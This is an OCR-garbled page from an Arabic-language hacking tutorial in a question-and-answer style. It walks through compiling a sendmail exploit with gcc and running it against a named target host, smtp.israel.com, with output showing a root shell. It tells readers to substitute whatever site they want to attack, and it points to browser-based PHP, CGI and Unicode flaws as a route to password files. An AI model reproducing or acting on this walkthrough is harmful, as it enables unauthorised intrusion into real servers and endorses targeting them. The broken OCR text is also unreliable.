Page 242 - بسم الله الرحمن الرحيم
P. 242
يعنى على سبيل المثال -:
gcc -o Conik conik.c
ورا ح يكون الملف جهاهز بعد هذه المر
Conik.c/.
وبعد ماصار الملف جهاهز
gcc -o sendmail sendmail.c $
sendemail/. $
<Usage : sendmail <host> <OS> <user> <password
<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous/. $
لحظ انك انته تصكتب هنا الموقع الى تصبغاه مكان israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root
لحظ انه طلب ممنا الملقم للبرنامج Sendemailوكمان طلب نظا.م التشغيل واليوزر والباسورد
وبعد هذه كله البرنامج أعطانا أمتياز Rootبسبب قيا.م البرنامج بتنفيذ الـ Exan nofer
ملحظة ل تصضن أنه لمن انا حطيت البرنامج XXX. SENDMAILبدون اى سبب أنا حطيت لك هذه المثال
لنه هناك ثغره فى هذه البرنامج
ورا ح أشرحها لك أن شاء ال تصعالى بس كان بدى تصحفظ السم هذه (-:
الظاهر انه نحنا أتصوغلنا فى الموضوع زايدة عن اللزو.م
س -:5يا ال كل هذه علشان ثغره بس بطلت أنا ما أبغا اتصعلم
جهـ -:لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جهدا جهدا
س -:6أيش هي قو ل يا Conikتصرى هذه الطريقة يبغالها نظا.م تصشغيل وكمان لغه Cو Perl
في تصغرات تصستخد.م من ختلل المتصفح يعنى انته تصشوف ملعومات الموقع عبر المتصفح وتصوصل الى ملف
الباسوردات من هذه الطريقه
ومثال على هذه الثغرات PHP - CGI - UNICODE - VB - etc
242